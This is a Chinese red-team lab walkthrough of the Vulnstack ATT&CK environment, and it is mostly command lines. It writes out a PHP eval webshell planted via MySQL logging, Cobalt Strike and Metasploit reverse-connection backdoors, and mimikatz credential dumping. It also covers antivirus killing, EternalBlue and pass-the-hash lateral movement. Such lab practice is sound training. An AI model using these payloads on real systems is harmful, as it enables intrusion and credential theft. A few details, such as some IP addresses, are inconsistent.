官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
- 关注
ATK&CK红队评估(一)
环境下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
环境搭建
三台虚拟主机默认开机密码都是 hongrisec@2019
win2003和win2008可能会提示密码过期,自己修改即可。
网络拓扑
win7服务器就是网关,要配置两张网卡,一张对外提供web服务,一张通向内网。
1.vmware中给win7添加一张网卡。
2.将网络适配器 1 设置成 VMnet1 仅主机模式(内网),网络适配器 2 设置成 NAT 模式(外网)
3.将win2003、win2008 网络适配器设置成VMnet1仅主机模式(内网)。
登录查看三台主机ip。
win7:192.168.52.143(内)/192.168.126.188(外)
win2003:192.168.52.141
win2008:192.168.52.138
攻击机kali:192.168.126.130
用win7ping一下kali,看是否通。
在win7里找到phpstudy开启web服务。
信息收集
nmap端口扫描:nmap --min-rate 10000 -p- 192.168.126.188
nmap -p 80,3306 -sV 192.168.126.188
可以看到目标开放了80,3306端口
80-http
3306-mysql
访问192.168.126.188:80
啥都没有,dirsearch扫一下目录。dirsearch -u http://192.168.126.188
攻击尝试
主要是phpmyadmin。访问一下,尝试弱口令登录。
试了几次就成功登录了,root/root标准的弱口令,如果猜不出来直接上字典爆破。
在php探针中得知网站绝对路径C:/phpStudy/WWW
phpmyadmin后台getshell
最常用的就是into outfile写入木马了,当然还有利用Mysql日志文件getshell。
1.into outfile写入木马
已经知道了网站绝对路径,直接写入试试。select '<?php eval($_POST[cmd]);?>' into outfile 'C:/phpStudy/www/shell.php';
失败。应该是secure_file_priv的值为NULL,导致不被允许读取任何文件。可以查看一下:show global variables like '%secure%';
果然是NULL,不允许into outfile方式写入木马,那就试一下日志文件getshell。
Mysql日志文件写入shell
查看日志状态:show variables like '%general%';
general_log为off,MySQL不在写入日志,需要将它打开。打开后,操作都将记录在general_log_file指定的文件目录中。SET GLOBAL general_log='on';
指定日志写入shell.php中SET GLOBAL general_log_file='C:/phpStudy/www/shell.php';
再看一下日志状态:show variables like '%general%';
现在直接把一句话木马写入shell.php中,只需要select一下木马,日志就会将它写入shell.php中:SELECT '<?php eval($_POST["cmd"]);?>';
有了后门就直接试一下蚁剑链接。
内网渗透
cs植入后门
1.生成exe后门。
生成后的exe使用蚁剑进行上传到靶机
在蚁剑的shell中执行后门:start artifact.exe
cs可以看到目标已经上线。
MS14-058提权:
成功提到system权限
先将心跳时间设置为3s,实战中不能过快。
信息收集
whoami
net start
ipconfig /all #查看本机ip,所在域
route print #打印路由信息
net view # 查看局域网内其他主机名
net config Workstation # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user # 查看本机用户列表
net user /domain # 查看域用户
net localgroup administrators # 查看本地管理员组
net view /domain # 查看有几个域
net group 组名 /domain # 查看域中某工作组
net user 用户名 /domain # 获取指定域用户的信息
net group "domain admins" /domain # 查看域管理员
net group "domain computers" /domain # 查看域中的其他主机名
net group "doamin controllers" /domain # 查看域控
wmic useraccount get /all #获取域内用户的详细信息
有god.org的域shell net config Workstation
查看域信息:shell net view
查看主域信息:shell net view /domain
查询当前的登录域与用户信息:shell net config workstation
域控的域名即 owa.god.org ,用 ping 即可反查出域控ip为192.168.52.138
获取域内用户的详细信息:shell wmic useraccount get /all
mimikatz抓取hash和明文密码,然后查看密码凭证
用CS的hashdump去读内存密码,用mimakatz读注册表密码:logonpasswords
探测内网其他主机for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr "TTL="
信息收集结果:
域名:god.org
域内五个用户:Administrator、Guest、liukaifeng01、krbtgt、ligang
域内三台主机:OWA、ROOT-TVI862UBEH(192.168.52.141)、STU1(win7)
域控:OWA(192.168.52.138)
win7内网ip:192.168.52.143
CS 横向移动
通过net view看到还有两个域用户。OWA和ROOT-TVI862UBEH。
新建一个listener,payload设置为Beacon SMB:
已有的beacon上右键spawn生成会话,进行派生
成功后这里又会一个这样的标识。
回到target列表,又键非域控主机,使用psexec横向。
成功上线ROOT-TVI862UBEH
同理上线OWA
三台目标机器全部拿下。
MSF横向移动
1.msf开启监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.126.130
set lport 6666
run
cs创建一个listener
蚁剑上传木马到目标靶机然后执行。
检查主机是否运行在虚拟机上:run post/windows/gather/checkvm
关掉主机杀毒软件:run post/windows/manage/killav
获取目标详情:sysinfo
配置静态路由run post/multi/manage/autoroute#加载autoroute模块,探测当前机器所有网段信息run post/multi/manage/autoroute SUBNET=192.168.52.0 ACTION=ADD#添加目标内网路由
2.扫描漏洞(ms17-010)
使用msf直接扫描域控win2008:
use auxiliary/scanner/portscan/tcp
set rhost 192.158.52.138
set ports 80,135-139,445,3306,3389
run
search ms17_010
use auxiliary/scanner/smb/smb_ms17-010
set rhosts 192.168.52.138
run
存在漏洞。
利用
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.52.138
run
失败。
哈希传递攻击(PTH)
hashdump
load kiwi
psexec|hash传递
探测445:
use auxiliary/scanner/smb/smb_version
set rhost 192.168.52.138
set threads 40
run
set rhost 192.168.52.141
run
exploit/windows/smb/psexec模块哈希传递攻击 Windows Server 2008
use exploit/windows/smb/psexec
set rhosts 192.168.126.188
set SMBUser administrator
set smbpass 00000000000000000000000000000000:NTLM值
成功
- 0 文章数
- 0 关注者